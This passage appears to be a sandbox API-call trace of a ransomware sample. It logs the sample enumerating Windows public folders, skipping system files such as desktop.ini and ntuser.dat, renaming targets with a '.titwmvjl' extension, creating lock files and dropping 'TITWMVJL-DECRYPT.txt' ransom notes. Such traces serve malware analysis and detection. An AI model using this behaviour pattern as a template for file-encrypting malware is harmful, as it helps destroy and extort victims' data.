[0097.111] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0097.111] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0097.111] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.112] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0097.112] FindClose (in: hFindFile=0x5037f8 | out: hFindFile=0x5037f8) returned 1 [0097.112] CloseHandle (hObject=0x230) returned 1 [0097.112] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0097.112] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0097.112] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0097.112] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0097.113] lstrcatW (in: lpString1="C:\\Users\\Public\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\" [0097.113] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0097.113] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.113] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0097.113] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.113] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0097.113] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.114] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0097.114] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.114] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0097.114] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.114] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.114] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Music\\\\TITWMVJL-DECRYPT.txt") returned 43 [0097.114] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\public\\music\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0097.115] GetLastError () returned 0x50 [0097.115] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.115] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.115] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0x1aa)) [0097.115] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.116] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0097.116] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0097.116] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Music\\d2ca4a09d2ca4deb61a.lock") returned 46 [0097.116] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\public\\music\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0097.116] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.117] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.117] lstrlenW (lpString="C:\\Users\\Public\\Music\\") returned 22 [0097.117] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Music\\*") returned="C:\\Users\\Public\\Music\\*" [0097.117] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\Music\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5035b8 [0097.117] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0097.117] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.118] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0097.118] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0097.118] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.118] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0097.118] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0097.118] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Public\\Music\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Public\\Music\\d2ca4a09d2ca4deb61a.lock" [0097.118] lstrlenW (lpString=".titwmvjl") returned 9 [0097.118] lstrlenW (lpString="C:\\Users\\Public\\Music\\d2ca4a09d2ca4deb61a.lock") returned 46 [0097.118] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.118] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Music\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 55 [0097.118] lstrlenW (lpString="C:\\Users\\Public\\Music\\d2ca4a09d2ca4deb61a.lock") returned 46 [0097.118] lstrlenW (lpString=".lock") returned 5 [0097.119] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.119] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0097.119] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.119] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.119] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.119] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0097.119] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0097.119] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Music\\desktop.ini") returned="C:\\Users\\Public\\Music\\desktop.ini" [0097.119] lstrlenW (lpString=".titwmvjl") returned 9 [0097.119] lstrlenW (lpString="C:\\Users\\Public\\Music\\desktop.ini") returned 33 [0097.119] VirtualAlloc (lpAddress=0x0, dwSize=0x82, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.120] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Music\\desktop.ini.titwmvjl") returned 42 [0097.122] lstrlenW (lpString="C:\\Users\\Public\\Music\\desktop.ini") returned 33 [0097.122] lstrlenW (lpString=".ini") returned 4 [0097.122] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.122] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0097.122] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0097.122] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.123] lstrlenW (lpString="C:\\Users\\Public\\Music\\desktop.ini") returned 33 [0097.123] lstrlenW (lpString="C:\\Users\\Public\\Music\\desktop.ini") returned 33 [0097.123] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0097.123] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.123] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.123] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0097.123] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0097.123] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\Music\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Public\\Music\\TITWMVJL-DECRYPT.txt" [0097.123] lstrlenW (lpString=".titwmvjl") returned 9 [0097.123] lstrlenW (lpString="C:\\Users\\Public\\Music\\TITWMVJL-DECRYPT.txt") returned 42 [0097.123] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.123] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Music\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 51 [0097.123] lstrlenW (lpString="C:\\Users\\Public\\Music\\TITWMVJL-DECRYPT.txt") returned 42 [0097.123] lstrlenW (lpString=".txt") returned 4 [0097.123] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.124] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0097.124] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0097.124] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.124] lstrlenW (lpString="C:\\Users\\Public\\Music\\TITWMVJL-DECRYPT.txt") returned 42 [0097.124] lstrlenW (lpString="C:\\Users\\Public\\Music\\TITWMVJL-DECRYPT.txt") returned 42 [0097.124] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0097.124] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0097.124] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0097.124] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0097.124] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0097.124] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0097.124] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0097.124] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0097.124] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.124] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0097.125] FindClose (in: hFindFile=0x5035b8 | out: hFindFile=0x5035b8) returned 1 [0097.125] CloseHandle (hObject=0x230) returned 1 [0097.125] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0097.125] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0097.125] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0097.125] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0097.125] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\" [0097.126] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0097.126] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.126] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0097.126] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.126] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0097.126] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.127] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0097.127] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.127] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0097.127] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.127] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.127] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Pictures\\\\TITWMVJL-DECRYPT.txt") returned 46 [0097.127] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\public\\pictures\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0097.128] GetLastError () returned 0x50 [0097.128] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.128] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.128] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0x1b9)) [0097.128] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.128] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0097.128] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0097.129] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Pictures\\d2ca4a09d2ca4deb61a.lock") returned 49 [0097.129] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\public\\pictures\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0097.129] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.129] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.130] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\") returned 25 [0097.130] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Pictures\\*") returned="C:\\Users\\Public\\Pictures\\*" [0097.130] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5034f8 [0097.130] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0097.130] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.131] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0097.131] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0097.131] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.131] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0097.131] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0097.131] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Public\\Pictures\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Public\\Pictures\\d2ca4a09d2ca4deb61a.lock" [0097.131] lstrlenW (lpString=".titwmvjl") returned 9 [0097.131] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\d2ca4a09d2ca4deb61a.lock") returned 49 [0097.131] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.131] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Pictures\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 58 [0097.131] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\d2ca4a09d2ca4deb61a.lock") returned 49 [0097.131] lstrlenW (lpString=".lock") returned 5 [0097.131] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.132] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0097.132] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.132] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.132] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.132] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0097.132] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0097.132] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Pictures\\desktop.ini") returned="C:\\Users\\Public\\Pictures\\desktop.ini" [0097.132] lstrlenW (lpString=".titwmvjl") returned 9 [0097.132] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\desktop.ini") returned 36 [0097.132] VirtualAlloc (lpAddress=0x0, dwSize=0x88, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.133] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Pictures\\desktop.ini.titwmvjl") returned 45 [0097.133] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\desktop.ini") returned 36 [0097.133] lstrlenW (lpString=".ini") returned 4 [0097.133] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.133] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0097.133] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0097.133] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.133] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\desktop.ini") returned 36 [0097.133] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\desktop.ini") returned 36 [0097.133] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0097.133] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.133] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0097.133] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0097.134] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0097.134] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\Pictures\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Public\\Pictures\\TITWMVJL-DECRYPT.txt" [0097.134] lstrlenW (lpString=".titwmvjl") returned 9 [0097.134] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\TITWMVJL-DECRYPT.txt") returned 45 [0097.134] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.134] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\Pictures\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 54 [0097.134] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\TITWMVJL-DECRYPT.txt") returned 45 [0097.134] lstrlenW (lpString=".txt") returned 4 [0097.134] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.134] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0097.134] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0097.134] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.135] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\TITWMVJL-DECRYPT.txt") returned 45 [0097.135] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\TITWMVJL-DECRYPT.txt") returned 45 [0097.135] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0097.135] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0097.135] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0097.135] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0097.135] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0097.135] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0097.135] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0097.135] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0097.135] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.135] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0097.135] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0097.136] CloseHandle (hObject=0x230) returned 1 [0097.136] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0097.136] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0097.136] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0097.136] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Public\\TITWMVJL-DECRYPT.txt" [0097.136] lstrlenW (lpString=".titwmvjl") returned 9 [0097.136] lstrlenW (lpString="C:\\Users\\Public\\TITWMVJL-DECRYPT.txt") returned 36 [0097.137] VirtualAlloc (lpAddress=0x0, dwSize=0x88, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0097.137] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Public\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 45 [0097.137] lstrlenW (lpString="C:\\Users\\Public\\TITWMVJL-DECRYPT.txt") returned 36 [0097.137] lstrlenW (lpString=".txt") returned 4 [0097.137] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0097.137] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0097.137] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0097.137] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.137] lstrlenW (lpString="C:\\Users\\Public\\TITWMVJL-DECRYPT.txt") returned 36 [0097.137] lstrlenW (lpString="C:\\Users\\Public\\TITWMVJL-DECRYPT.txt") returned 36 [0097.137] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0097.137] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0097.137] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0097.137] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0097.138] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0097.138] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0097.138] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0097.138] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0097.138] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.138] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0097.138] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0097.138] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0097.138] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0097.138] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\" [0097.138] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0097.138] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.139] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0097.139] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.139] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0097.139] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.139] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0097.139] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0097.139] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0097.139] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.139] VirtualAlloc 